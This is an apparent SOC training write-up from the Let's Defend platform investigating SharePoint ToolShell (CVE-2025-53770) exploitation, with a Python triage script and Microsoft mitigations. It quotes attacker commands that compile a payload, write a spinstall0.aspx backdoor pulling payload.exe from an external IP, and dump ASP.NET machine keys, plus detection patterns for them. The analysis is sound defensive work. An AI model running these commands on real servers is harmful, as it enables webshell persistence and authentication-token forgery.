PoC details: 38895f8c6c30bb92e070b07a36adcc1cdfbda546

Related vulnerability
Title: Microsoft SharePoint Server security vulnerability (CVE-2025-53770)
Description: Microsoft SharePoint Server is a collaboration platform from Microsoft (USA). Microsoft SharePoint Server contains a security vulnerability caused by deserialization of untrusted data, which may lead to remote code execution.
Description
An activity to train analysis skills and reporting
Introduction
# SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE

This is an investigation conducted on the Let's Defend platform, based on a recent SharePoint CVE. Let's take a look.

<img width="1441" height="633" alt="Immagine 2025-07-27 162109" src="https://github.com/user-attachments/assets/e4ccbb6d-42bc-4b5e-9af9-25944277cb65" />

1. Examine the rule name. Rule names are usually created specifically for the attack to be detected. By examining the rule name, you can understand which attack you are facing.

The SOC342 rule detected an unauthenticated POST request targeting the vulnerable ToolPane.aspx page, featuring:

- a large payload (Content-Length: 7699)
- a suspicious referer (SignOut.aspx), likely used to obfuscate the origin
- behavior consistent with exploitation of the ToolShell vulnerability

2. Detect between which two devices the traffic is occurring. 

An external user (IP: 107.191.58.76) sent a crafted request to an internal SharePoint server (172.16.20.17).

Analyze the log of our endpoint

<img width="971" height="478" alt="2" src="https://github.com/user-attachments/assets/7864bf21-da4e-4ac9-b73d-eab8d5cb9b73" />

A w3wp.exe process executing an encoded PowerShell command may indicate exploitation or post-exploitation activity (e.g., execution of a hidden payload).

In a SharePoint environment, it is important to verify whether this behavior is expected or if it represents abuse.

The command has been obfuscated using base64.

<img width="727" height="426" alt="Immagine 2025-07-27 163800" src="https://github.com/user-attachments/assets/b8a394ac-bea3-4fc9-bd71-34ac501aeff5" />

This payload allows the attacker to extract and print critical ASP.NET configuration keys from the machine it runs on.

```
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs
```

Compiles an executable from C# source code on the server.

```
"C:\Windows\System32\cmd.exe" /c echo <form runat=\"server\"> <object classid=\"clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11\"><param name=\"Command\" value=\"Redirect\"> <param name=\"Button\" value=\"Test\"> <param name=\"Url\" value=\"http://107.191.58.76/payload.exe\"></object></form> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx
```

Creates a web backdoor (malicious ASPX file) in the SharePoint path, which, when visited, allows an external payload to be executed or downloaded.

```
cmd.exe /c echo <WebShell> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx
```

This command creates a file named spinstall0.aspx in the SharePoint LAYOUTS folder and writes the content <WebShell> into it (here <WebShell> is a placeholder representing the code of a webshell).

This is the SHA-256 hash of spinstall0.aspx: 92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514

Let's take a look on VirusTotal.

<img width="1662" height="802" alt="Immagine 2025-07-27 164912" src="https://github.com/user-attachments/assets/8d5c732c-abe5-45a7-baff-200f3d77485f" />

```
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"
```

This command lets the attacker read the MachineKeySection application config, which exposes sensitive cryptographic keys such as the validation key and the decryption key.

These keys are critical for ASP.NET security, protecting things like authentication cookies and ViewState.

Exposing or retrieving these keys can enable attackers to forge authentication tokens, decrypt protected data, or perform other attacks against the web application.
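As an added example (not part of the original writeup or of the Let's Defend platform), the following Python script shows how the endpoint events discussed above could be triaged automatically: it decodes a -EncodedCommand argument (base64 of UTF-16LE) and flags w3wp.exe children that read the machine keys, invoke csc.exe, or drop spinstall*.aspx into the LAYOUTS folder. The events and their field names are constructed samples modelled on the alert.

```python
import base64
import re

def encode_ps(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events modelled on the alert; field names are an assumption.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand " + encode_ps(
         "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()")},
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe", "image": "cmd.exe",
     "cmdline": r'cmd.exe /c echo <WebShell> > "C:\Program Files\Common Files\Microsoft Shared'
                r'\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx"'},
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe", "image": "csc.exe",
     "cmdline": r"csc.exe /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs"},
    {"parent": r"C:\Windows\explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -Command Get-Date"},  # routine admin use, should stay clean
]

ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
INDICATORS = {
    "machine_key_read":  re.compile(r"MachineKeySection|GetApplicationConfig", re.I),
    "csc_compile":       re.compile(r"csc\.exe\s+/out:", re.I),
    "layouts_aspx_drop": re.compile(r"TEMPLATE\\LAYOUTS\\spinstall\d*\.aspx", re.I),
}

def decode_encoded_command(cmdline: str):
    """Return the plaintext behind a -EncodedCommand argument, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed blob: nothing to match on, but still worth an analyst's look

def triage(event: dict) -> list:
    """Name every ToolShell-style indicator the event matches; an empty list means clean."""
    hits = []
    if event["parent"].lower().endswith("w3wp.exe"):
        hits.append("w3wp_child")  # IIS worker process spawning a shell or compiler
    text = event["cmdline"]
    decoded = decode_encoded_command(text)
    if decoded:
        text += " " + decoded  # search the decoded script as well as the raw command line
    hits += [name for name, rx in INDICATORS.items() if rx.search(text)]
    return hits
```

Call triage(event) on each record: the explorer.exe-spawned PowerShell returns an empty list, while each of the three w3wp.exe children returns w3wp_child plus one technique-specific indicator.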


MITRE ATT&CK

<img width="723" height="247" alt="mitre" src="https://github.com/user-attachments/assets/61fe2244-9ec5-4dce-a97a-7462b5d9d1ad" />

Analyst note:

The alert was generated due to unusual PowerShell activity observed on a SharePoint server, later determined to be an exploitation attempt targeting CVE-2025-53770. The attacker initially dropped and compiled a custom C# executable (payload.exe) using the C# compiler (csc.exe), then created a malicious ASPX webshell (spinstall0.aspx) within a web-accessible SharePoint directory. Subsequently, a PowerShell command was run to retrieve sensitive cryptographic machine keys from the server’s configuration via .NET reflection. This sequence of actions suggests a multi-phase attack designed to maintain persistent control and possibly forge authentication tokens. The webshell was verified as malicious with a VirusTotal detection ratio of 39/62. The incident is confirmed as a true positive, and further containment and remediation measures are advised.

<img width="1252" height="342" alt="Immagine 2025-07-27 170751" src="https://github.com/user-attachments/assets/c9cda5a1-fb1d-48e9-974e-981db4c6d5dd" />

CVE-2025-53770 Detail 

Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild. Microsoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.

<img width="1162" height="175" alt="Immagine 2025-07-27 171020" src="https://github.com/user-attachments/assets/c4872343-17c5-4beb-987f-237efabd9f57" />

Mitigation suggested by Microsoft:
To mitigate potential attacks customers should:

1. Use supported versions of on-premises SharePoint Server

2. Apply the latest security updates linked above.

3. Deploy Microsoft Defender for Endpoint protection, or equivalent threat solutions

4. Ensure the Antimalware Scan Interface (AMSI) is turned on and configured correctly, with an appropriate antivirus solution such as Defender Antivirus

5. Rotate SharePoint Server ASP.NET machine keys

IoC

| Indicator | Description |
| --- | --- |
| spinstall0.aspx | Web shell used by threat actors |

Actors have also modified the file name in a variety of ways, such as spinstall.aspx, spinstall1.aspx, spinstall2.aspx.

This report is based on an activity conducted on the Let’s Defend platform. All findings and materials presented are for educational purposes only. All rights and ownership belong to Let’s Defend.